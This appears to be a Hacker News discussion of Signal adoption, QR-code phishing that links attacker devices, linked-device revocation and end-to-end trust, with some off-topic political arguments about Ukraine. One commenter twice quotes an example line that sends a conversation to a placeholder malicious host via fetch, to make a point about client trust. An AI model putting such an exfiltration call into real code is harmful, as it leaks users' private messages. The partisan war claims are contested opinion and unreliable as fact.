I usually tell people, "It's like iMessage, but it works on iPhone and Android," or "Hey, if you download Signal we can send high-quality photos between Android and iPhone."
My (non-technical) Mom actually got my whole extended family on Signal with a group link. Since there's no real account creation it was painless. It's how we do all video calls/photo sharing/chat now.
I helped an especially non-technical user install Signal and they didn't need my help at all. They were using it in a minute - download from the app store, transcribe a code from a text message, and you're in - and it worked just like legacy text and phone.
I'd tell them that - just download it and you'll be texting me in a minute, and now nobody is tracking everyone you talk to.
On Signal, unless there is some bug or outright fraud, AFAIK they cannot - that is one of their fundamental goals, and they did a lot of work to develop communication technology that works without revealing that metadata.
(Of course, if someone gets access to your phone, then they know who you are talking to.)
That kind of metadata is not stored by Signal, as far as I know.
But yes, the data streams between two endpoints can be linked as communicating with each other.
I've still got Signal installed, but never use it, I only ever ended up chatting on it with a few ex-colleagues, who were fellow devs / nerds.
I have so many WhatsApp group chats (here in Australia) that are critical for me these days, and that I don't control, and that have way too many people, and way too diverse a range of people, for me to have any hope whatsoever of migrating them all to Signal. School parents group chats (one for each class that my kids are in). Strata (aka Home Owners Association) committee group chat. Scouts group chat. Various friends groups chats. Boycotting WhatsApp is not an option for me, it would literally make me unable to function in a number of my day-to-day responsibilities.
Group stories are great fun and a feature I seriously miss on Whatsapp. They work well from meme chats to family groups.
There being a killer feature that Whatsapp users are missing out on won't convince everyone but it sure makes me feel less like a nerd when encouraging the switch to Signal.
I find it quite funny that such an obvious feature likely hasn't been added to Whatsapp yet because Meta thinks Instagram is for stories. That's pure speculation on my part though
I've had good luck just asking for it, even with group chats (though admittedly my friends are mostly technical and more privacy conscious than the average person). Usually it's a switch from FB Messenger and I just say that I don't want to be locked into Facebook anymore.
I thought they recorded the metadata - who talks to who and when. (For the uninitiated, that is as valuable or more valuable than the message contents.)
It isn't a viewpoint; it's a fact. I've been using Signal for almost a decade now and have only managed to get a dozen or so people to use it in any capacity. Most keep using WhatsApp as their primary method of communication anyway.
Maybe you should? It might help improve your reading comprehension. The person you're responding to said that most normal people don't care enough to switch to a vastly less popular app, which is obviously true.
My Signal experience: ex gf in college asks what app I’m using to text. Tell her it’s Signal, E2EE, messages are only stored on her phone and nobody else can read them. She says cool and downloads the app. Four months later her phone breaks.
“Hey subjectsigma I got my new phone today. Where are all my messages?”
“… Do you have your old phone? That’s the only place they are.”
“No? Last time I got a new phone WhatsApp moved my messages over, and WA is E2EE so I thought it worked the same way.”
“Nope if you don’t have a backup or your old phone they’re gone. Sorry.”
“This is bullshit. Why does anyone use Signal. I can’t believe it deleted all my messages. I’m uninstalling it. Etc etc.”
It only works for WhatsApp if you have Backup to Google activated[1]. I once tried to work with backed-up files from my old phone and it didn't work. (Older tutorials indicated that it once worked, though.)
[1] There was a time WhatsApp had a nag-screen if you didn't have Backup to Google activated. So I guess most people would have eventually caved.
That nag-screen is still there, it pops up roughly every three months for me (though not on my primary phone, Whatsapp won't get anywhere near that one).
Russia fucking up the world's stuff this decade will be material for the history books. They are actively breaking Europe and almost no one seems to care.
If Europe is what it claims to be, an enlightened democracy with a progressive, intelligent populace, it cannot be broken by demented crap messages from Twitter.
If, however, it is fucked up and on the brink of collapse, then sure, a little nudge can steer it in the "right" direction. But then who is guilty in the first place?
That's part of the propaganda. Please ignore the Internet Research Agency's massive army of troll farms and bots. Please ignore that they controlled half of the largest American Facebook groups catering to racial identity or religion. Nothing to see and no impact.
I'm not going to psychoanalyse the brain parasite, but I imagine that the reason to do it could be as petty as shadow banning people with Fediverse (e.g. mastodon) handles in their bios shortly after he took over.
Only signal.me links were blocked as far as I understood. Other signal links kept working. (I have no first hand knowledge as I left Twitter when the owner changed)
Unrelated most likely, signal.me is a legitimate domain used by Signal. Doubt twitter is so on top of Threat Analysis when they fumbled their own redirects from twitter.com to x.com for a while.
Not really, the domain block was reportedly due to increased spam activity from that domain and performed automatically, so it would follow that a write up would come a few days later. That is if they are related, which is not a given.
It’s still a social media platform; not every action taken is some nebulous part of Musk's agenda. Odds are there was an influx of posts from the signal.me domain that qualified as spam and were marked by an automatic system as spam, because they were. Suggesting otherwise is baseless speculation.
Given that Musk has deliberately blocked links to whole other domains before for extremely petty reasons, I don't see why we should give him the benefit of the doubt.
Alphabet is working in tandem with the Ukrainian SBU? An interesting choice, just as the US President has called Zelensky a dictator (and for good reason: Poroshenko, the previous Ukrainian president, said basically the same thing a few days ago). I wonder how long the Alphabet higher-ups will let this unfold, or maybe they're not so good at reading the geopolitical tea leaves.
> US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago)
You can't be serious that you consider that to be a good enough reasoning.
Zelensky's support / approval rating is well over 50% (according to polls). Zelensky defeated Poroshenko, getting 73% of the vote in the 2019 election.
And yet he still felt the need to politically repress Poroshenko with sanctions and brand him a traitor; that's the mark of having a dictator in command of things.
They're calling Zelensky a dictator because his term was originally scheduled to end in 2024 unless re-elected, and there were no elections since the beginning of the war.
The problem with this assertion is that Ukraine has "no elections under martial law" written into the law. Zelensky himself actually wanted to do some kind of election to reinforce his mandate while his support was still very high, but there was serious concern from the liberals about those plans on the basis that any election held under martial law, with large numbers of people mobilized to fight, 20% of the country occupied, and many millions of refugees unable to vote, would hardly be free and fair. Their pushback scuttled any plans for the parliament to amend said law.
Signal (and basically any app) with a linked devices workflow has been risky for awhile now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.
I'm only surprised it took this long for an in-the-wild attack to appear in open literature.
It certainly doesn't help that Signal themselves have discounted this attack (quoted from the IACR eprint paper):
"We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.
Thus, carrying out this attack would seem to require hardware access to one of the victims' devices (or some other backdoor), in which case you've already lost.
Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.
No, it means that if you approve a device to link, and you later have reason to unlink the device, you can't establish absolutely that the unlinked device can no longer access messages, or decrypt messages involving an account, breaking the forward-secrecy guarantees.
That leaves the only remedy for a Signal account that has accepted a link to a 'bad device' being to burn the whole account (maybe rotating safety numbers/keys would be sufficient; I am uncertain there). If you can prove the malicious link was only a link, then yeah, the attack I described is incomplete, but the issues in general with linked devices and the remedies described are the important bits, I think.
That's not what the attack does though - they have access to your private key, so they can complete the linking protocol without your phone and add as many devices as they want (up to the allowed limit). If you add a bad device, you are screwed from that moment on, assuming you don't sync your chat history.
You can always see how many devices a user has: they have a unique integer id, so if I wanna send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly then that is an oversight for sure, but I don't think that's the case anymore.
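A sketch of that sender-side fan-out, with a hypothetical directory stub standing in for the Signal server (the names and the toy callback are made up; the real thing encrypts under a per-device session):

```python
class Server:
    """Hypothetical directory stub: maps a user to their device ids.
    An honest server reveals every linked device, which is why the
    device count is visible to anyone who messages you."""
    def __init__(self):
        self.devices = {"bob": [1, 2]}   # 1 = phone, 2 = linked desktop

    def devices_for(self, user):
        return self.devices[user]

def fan_out(server, recipient, plaintext, encrypt_for):
    """One ciphertext per recipient device, as the sender produces in Signal."""
    return {dev: encrypt_for(recipient, dev, plaintext)
            for dev in server.devices_for(recipient)}

# Toy 'encryption' callback, just to show the shape of the fan-out:
msgs = fan_out(Server(), "bob", b"hi", lambda u, d, m: (u, d, m))
assert set(msgs) == {1, 2}   # one copy exists per linked device
```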
Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the same view of your account (keys), which is why key transparency is such an important feature.
That sounds exactly like what GP wrote.
That is really quite bad.
It sounds like all that's needed is a device that had been linked in the past. Unlinking doesn't have the security properties you'd expect it to, and there's a phishing attack that makes scanning a QR code trigger a device link (which seems really, really bad if the user doesn't even have to take much action).
Your phone (primary device) and the linked ones have to share the IK, since that is the "root of trust" for your account: with it you generate new device keys, renew them, and so on.
Those keys are backed by the Keystore on Android, and by similar systems on Windows/Linux; I'd assume the same for macOS/iOS (but I don't know the details). So it's not as simple as just having access to your laptop; they'd need at least root.
Phishing is always tricky, probably impossible to counter sadly - each one of us would be susceptible at the wrong moment.
I think the point is that as a user you expect revocation of trust to protect you going forward, yet it doesn’t (e.g. the server shouldn’t keep forwarding new messages to a revoked device). That’s a design decision Signal made, but clearly it’s one that leaves you open to harm. Moreover, it’s a dangerous decision because after obtaining the IK in some way (e.g. from a stolen device) you’re able to surreptitiously take over the account without the user ever knowing (i.e. no phishing needed). As an end user these are surprising design choices, and that Signal discounted this as not part of their threat model suggests to me their threat model has an intentional or unintentional hole; second-hand devices that aren’t wiped are common and jailbreaks exist.
This isn’t intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or impersonating sending messages. A simple one would be that each new device establishes a new key that the server recognizes as pertaining to that device and notifications are encrypted with a per-device key when sending to a device and require outbound messages to be similarly encrypted. There’s probably better schemes than this naive approach.
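A naive sketch of that proposal (a hypothetical scheme, not Signal's actual protocol): the server holds one random delivery key per enrolled device, so revoking a device removes its key and a stolen IK alone no longer suffices to keep receiving messages:

```python
import os, hashlib

class PerDeviceKeys:
    """Hypothetical per-device delivery keys, as the comment above
    suggests. All names are made up for illustration."""
    def __init__(self):
        self.keys = {}

    def enroll(self, device_id):
        self.keys[device_id] = os.urandom(32)

    def revoke(self, device_id):
        self.keys.pop(device_id, None)

    def wrap(self, device_id, ciphertext):
        if device_id not in self.keys:
            raise PermissionError("device revoked: no delivery key")
        # Stand-in for an AEAD keyed by the per-device key.
        return hashlib.sha256(self.keys[device_id] + ciphertext).digest()

s = PerDeviceKeys()
s.enroll("desktop")
s.wrap("desktop", b"msg")     # delivered while enrolled
s.revoke("desktop")
# s.wrap("desktop", b"msg")   # would now raise PermissionError
```

The obvious caveat: this only protects *future* delivery, and only as long as the server honestly drops revoked keys, which is the same trust problem key transparency tries to address.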
Revocation of trust is always a tricky issue, you can look at TLS certificates to see what a can of worms that is.
The Signal server does not forward messages to your devices; the list of devices someone has (including your own) can and has to be queried in order to communicate with them, since each device establishes unique keys signed by that IK. So it isn't as bad as having invisible devices you'd never be aware of. That of course relies on you being able to ensure the server is honest and consistent, but that is work they already have in progress.
I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here: if your phone is informed a new device was added without you pressing the Link button, you can assume something's phishy), (2) how you properly warn people when something bad happens, and (3) how you inform users such that you both share a similar mental model. You also have to achieve all this without overwhelming them.
I would be surprised if there aren’t ways to design it cryptographically to ensure that an unlinked device doesn’t have access to future messages. The problem with how Signal has designed it is that it is a known weakness that Signal has dismissed in the past.
“Just install this Chrome browser extension” is all it takes now. Hell, you can even access cookies and previously visited sites from within the browser. All it takes is some funky ad, or Chrome extension, or some llama-powered toolbar to gain access and do exactly that.
Background services on devices have been a thing for a while too. Install an app (granting all the permissions it asks for) and bam: a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc.
How is that related in any way to Signal?
My point is that anything you install on your device is a vector. It can mount MITM attacks, read your data, etc. Sidecar attacks.
This was classic phishing though
This is my read as well. Just double clicking here.
The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.
Outside of lab settings, the only ways to do that are:
- (1) you get root access to the user's device
- (2) you compromise a recent chat backup
The campaign Google found is akin to phishing, so it's not as problematic on a technical level. How you warn someone they might be doing something dangerous is an entire can of worms in Usable Security... but it's gonna become even more relevant for Signal once adding a new linked device also copies your message history (and the last 45 days of attachments).
If one doesn't use the linked device feature, does that impact this threat surface?
About the paper: if someone has gotten access to your identity (private) key, you are compromised, either via their attack (adding a linked device) or by simply being MitM'ed and having all your messages decrypted. The attacker has won.
The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.
One thing I'm realizing more and more (I've been building an encrypted AI chat service powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean, at the end of the day you can put a one-line fetch/analytics-tracker/etc. on the rendering side and everything your protocol claimed to do becomes useless. That even extends to the OS the rendering is done on.
The last bit adds an interesting facet: even if you manage to open source the client and make it verifiably buildable by the user, you still need to distribute it through the iOS App Store. Anything can happen in the publish process. I use iOS as the example because it's particularly tricky to load your own build of an application.
And then if you did all that, you'd still need to do it all on the other side of the chat too, assuming it's a multi-party chat.
You can have every cute protocol known to man, the best encryption algorithms on the wire, etc., but at the end of the day it's all trust.
I mention this because these days I worry more that using something like Signal actually makes you a target for snooping under the false guise that you're in a totally secure environment. If I were a government agency with intent to snoop, I'd focus my resources on Signal users; they have the most to hide.
Sometimes it all feels pointless (besides encrypted storage).
I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicon, through the OS, all the way to how packets are forwarded from you to the person on the other end.
This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.
I think what will become more important is to have enough mechanisms to categorically prove whether an entity you trust to a certain extent is acting maliciously, and to hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a loud enough loudspeaker to voice distrust.
A few examples:
- certificate transparency logs, so your traffic is not MitM'ed
- reproducible builds, so the binary you get matches the public open source code you expect it does (regardless of its quality)
- key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's
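As a sketch of the transparency idea behind the last two points: inclusion in an append-only Merkle-tree log can be verified from a short proof, so a client can check that the key it was handed is the one everyone else sees. (Toy code; real logs such as Certificate Transparency add consistency proofs, signed tree heads, and more.)

```python
import hashlib

def h(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()

def leaf(data: bytes) -> bytes:
    return h(b"\x00" + data)          # domain-separated leaf hash

def node(l: bytes, r: bytes) -> bytes:
    return h(b"\x01" + l + r)         # domain-separated interior hash

def verify_inclusion(leaf_data, proof, root):
    """Check that `leaf_data` (e.g. a user's current public key) is in
    a log with the given Merkle root. `proof` is a list of
    (sibling_hash, sibling_is_on_the_right) pairs, leaf to root."""
    cur = leaf(leaf_data)
    for sibling, right in proof:
        cur = node(cur, sibling) if right else node(sibling, cur)
    return cur == root

# Tiny two-leaf log: [alice_key, bob_key]
a, b = leaf(b"alice-pubkey"), leaf(b"bob-pubkey")
root = node(a, b)
assert verify_inclusion(b"alice-pubkey", [(b, True)], root)
```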
> This makes that entire goal moot
I agree. Perhaps that's why I find discussions like nonce lengths and randomness sources almost insane (in the sense of willfully missing the forest for the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.
But depending on your threat model, it can still be useful. If a state actor has a backdoor into something, would they burn that capability to get you? If you are a dissident in a totalitarian state, you would expect them to throw everything at you and not tell anyone how or why. If you are a terrorist and could be tried in a “classified” setting, you would expect them to throw everything at you. If you are Jane Average passing nudes and talking about doing a little Molly last weekend, and would have a lawyer go through discovery, you are probably safe.
I don't think they are insane, they are quite useful when designing security mechanisms, while at the same time being utter noise for the end-user benefiting from that system.
> If you're building a chip to generate prime numbers I do surely hope you know how to select randomness or make constant time & branch free algorithms, just like an engineer designing elevators better know what should be the tensile strength of the cable it'll use. In either cases, it's mumbo jumbo for me, and I just need to get on with my day.
Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.
I almost find it worse. Using your analogy, it's akin to doing atomic simulations on the elevator cable quality while the elevator car is missing a floor.
I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)
There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.
I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.
At a casual glance, any E2EE system can be reduced to your ironclad legally guaranteed (ILG) system by having the platform keep a copy of the key(s), for instance. So it doesn't have to be a one-or-the-other choice.
How does giving the platform the keys guarantee legal consequences for them if they use the keys to read your messages?
> Sometimes it all feels pointless
Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).
> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.
> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
I think your comment in general, and this part in particular, forgets what the state of telecommunications was 10-15 years ago. Nothing was encrypted. Doing anything on public wifi was playing Russian roulette, and signals intelligence agencies were having the time of their lives.
The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.
I think that part of what you are talking about is sometimes called "attestation". Basically a signature, with a root that you trust, that confirms beyond doubt the provenance of the entity (phone + OS + app) that you interact with.
Android has that and can confirm to a third party that the phone is running, for example, a locked bootloader with a Google signature and a Google OS. It's technically possible to use a different chain of trust and get remote parties to accept, say, a Google phone running LineageOS as "original" software.
The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.
A fully transparent attested artifact, which doesn't involve blind trust in an entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of a signature-based root of trust.
All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.
> "E2E encryption" really requires the client to be built and verified by the end user
We probably agree that this is infeasible for the vast majority of people.
Luckily reproducible builds somewhat sidestep this in a more practical way.
I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.
With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."
[0] https://github.com/maqp/tfc
> "E2E encryption" really requires the client to be built and verified by the end user
But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.
At the end of the day you have to put your trust somewhere, otherwise you can never communicate.
It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.
Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.
tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
> tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
This is sorta my point, lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).
It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
The article says they phish people into linking adversarial devices to their Signal:
> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]
There's a new feature to sync old messages that seems like it could potentially make that attack vector ten times worse:
https://www.bleepingcomputer.com/news/security/signal-will-l...
Would a malicious URL be able to activate this feature as part of the request?
Probably not; in any normal case a secondary device shouldn't have that kind of authority.
It is more concerning if the toggle is on by default and then you carelessly press next (on this or some other kind of phish).
Is this serious?
It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (one they already know how to use, without additional training).
The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me; I would expect someone is working on securing them well enough that even Russian intelligence doesn't have an effective exploit.
The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.
I seem to recall uploaded selfies being a frequent source of problems. For example: https://www.rferl.org/a/trench-selfies-tracking-russia-milit...
Phones aren’t secure but are more secure than the standard radios most have access to.
Encrypted milspec comms aren’t the standard in a massive war.
It’s weird, but Discord, Signal, and some mapping apps on smartphones are how this war is being fought.
> Encrypted milspec comms aren’t the standard in a massive war.
It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.
Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with patchwork of ad hoc solutions originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.
But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).
At the start of the invasion in Ukraine it was possible for a while to listen to unencrypted radio comms from Russian convoys, hosted online live.
Russians aren't allowed to bring phones to the frontlines, apparently, but Ukrainians often still do, as they have the combat management app which is critical to operations. I've always wondered if this is why there's far more published footage of Ukrainian combat video than Russian, beyond the donation incentive attached to videos when publishing them on YouTube/Telegram.
In the first weeks of the war you could see Russian armored columns clearly on Google Maps as heavy traffic (along with other military activity but the columns really stood out). https://www.theverge.com/2022/2/28/22954426/google-disables-...
> I've always wondered if this is why there's far more published footage of Ukrainian combat video than Russian.
I'm sure Russia's meat-wave tactics have more of a role. If you're sending your troops on suicide missions, including guys without weapons and even on crutches, you're not exactly keen on having them carry mobile phones to document the experience or, heaven forbid, survive by surrendering.
This meatwave meme needs to die. Again, if Ukrainians are being beaten by guys on crutches, it says so much about this NATO-armed and -trained force.
> This meatwave meme needs to die.
Are you sure it's a meme, though? There is plenty of footage out there, documenting meat wave tactics in 4k. Have you been living under a rock?
> Again ,if Ukrainians are being beaten by guy in crutches (...)
What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine and Ukraine started invading and occupying Russian territory. Is this your definition of being beaten?
I'm not sure how applicable the NATO training is in this war. It's a trendsetter for sure
I think a large chunk of the footage is taken by gopros or similar, not smartphones.
And I think pretty much all published Ukrainian and Russian combat footage is vetted by their respective militaries (who would want to be court-martialed for Reddit karma?).
They just take different approaches to what, when, and where to release the footage.
Where is the fighting, and who runs the cellular networks in that area?
I’d want to run military communications on a network my side controls
A radio on a soldier is already a dangerous communications device - with a radio you can call in artillery strikes, for example.
There's no particular need IMO to secure smartphones on the battlefield in anyway beyond standard counter-measures - i.e. encrypt the storage, use a passcode unlock.
The Russian military would beg to differ, see the sibling's comment: https://news.ycombinator.com/item?id=43106162
That's referring to people literally posting selfies online (with the result of giving away their location by either metadata or geo-guessing).
Which is a process and procedure issue, more than a security issue on the phones themselves (except insofar as it's really obvious there's a solid need for an OS for a battlefield device which strips all that stuff out by default).
Smartphones store data; radios (depending on the radio) do not. The Russian military likely has tools for bypassing typical security.
Soldiers are not allowed to carry a cell phone.
Clearly, some folks didn't get the memo.
https://www.cbc.ca/news/world/russia-troops-cellphone-ukrain...
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
> you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.
Do you have reason to think there is not confirmation? Maybe Signal's documentation will tell you.
> Do you have reason to think there is not confirmation?
The reason is just that in the article it says:
> threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance
That phrasing suggests to me that the scanning of the QR code, on its own, performs the linking. That may not be the case, but if so I'd say the wording is misleading or at least imprecise.
In fairness, I think it's misleading to you due to the details you are interested in. They don't say otherwise and they can't lay out every detail that anyone might be interested in; it's not an RFC.
> Maybe Signal's documentation will tell you.
Not the person you replied to, but I just tried googling half a dozen different terms and got results that have nothing to do with Signal.
> Remember that Signal is designed for non-technical users.
That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that?" And the button says "link devices", not "yes" or "no".
I think the frustration here is that Signal petulantly and paternalistically refuses to allow you to fully sync to another device (and for years refused to even allow you to back up messages) because supposedly we can't be trusted with such a thing...but then they leave the QR code system so idiotically designed it's apparently trivial to phish people into linking their devices to malicious actors?
Why the fuck does scanning a QR code, without having first selected "link device", even open that dialog? Or require a PIN code they obsessively force us to re-enter all the time?
It's obviously ripe for abuse.
We admonish people for piping a remote document into their shell but a QR code that links devices with one click is OK?
> That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that? And the button says "link devices", not "yes" or "no."
As an experiment, I just linked a device to my Signal account. After clicking "Link new device" in Signal, and then scanning the QR code, a dialog popped up: "Link this device? This device will be able to see your groups and contacts, access your chats, and send messages in your name. [Cancel] [Link new device]"
If I scan the QR code with Google Lens instead, it reads and displays the sgnl://linkdevice... URL but does not launch (or offer to launch) Signal.
Related: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
(via https://news.ycombinator.com/item?id=43103692, but no comments there)
The good news is the target is targeted for a reason: it's still effective.
There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.
Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.
This is not a simple conversation.
> There are many voices which try to tell you that signal is compromised.
But compromised by whom? Russian, US Intelligence? I am really confused.
I just looked quickly on on the Signal Foundation website and the board members, I read things like:
> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.
> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board
> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.
Those type of people sound part of the intelligence world to me. What exactly are they doing on the board of Signal (an open source messaging app)?
> This is not a simple conversation.
I agree
And Telegram is specifically bad here: it uses custom crypto on a custom protocol, doesn't have any E2EE by default whatsoever, and stores everything on the server in plain text.
Also, it's a tricky environment of disinformation generally, and in particular for anything valuable like Signal. If Signal is secure, attackers on privacy would want people to believe Signal is compromised and to use something else. If it's not, then they would want people to believe Signal is secure.
I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.
I would also read it from another perspective. Attackers, especially at the level of nation states, will always try to get as many avenues for achieving their goals as possible.
If you have compromised a service, it would be in your interest to make it more popular (assuming you think you are the only one in possession of it).
If you cannot, you don't give up; you just go back to the drawing board (https://xkcd.com/538/). Maybe I don't need to break Signal if I can just rely on phishing or scare tactics to get what I want.
> web scale
I didn't realize anyone still used that term with a straight face.
"MongoDB is web scale, you turn it on and it scales right up."
I've struggled occasionally with trying to describe a similar concept without using that tainted term.
You can check for unexpected linked devices in the settings menu.
I wonder if Signal should expose linked devices directly in the UI at all times. Something like a small icon that indicates "You have 3 linked devices active" or similar.
Would probably lead to notification fatigue.
Showing a big snackbar when a new device is added is probably enough, especially if the app can detect there was no "action" on your phone that triggered it.
Key transparency, once rolled out, would help to ensure there is no lingering "bad" device around, but phishing will always be a problem.
"Would probably lead to notification fatigue."
Probably true...
> Showing a big snackbar when
A big... what?
Can you tell me what this new lingo is for someone who doesn't use the latest and shittiest marketing lingo?
It’s UI design language: https://developer.android.com/reference/com/google/android/m...
> latest and shittiest marketing lingo
It exists since Android 6: https://developer.android.com/reference/com/google/android/m...
Informative banner that does not require user interaction to dismiss.
Snackbar isn't a particularly new term, it goes back, IIRC, to the first version of Material Design and is similar to a toast but different in that snackbars may support interaction whereas toasts are non-interactive.
An in-app notification along the bottom of your screen. Usually just some text on a dark grey or black background.
> shittiest marketing lingo
Is that what you call the words you don't understand?
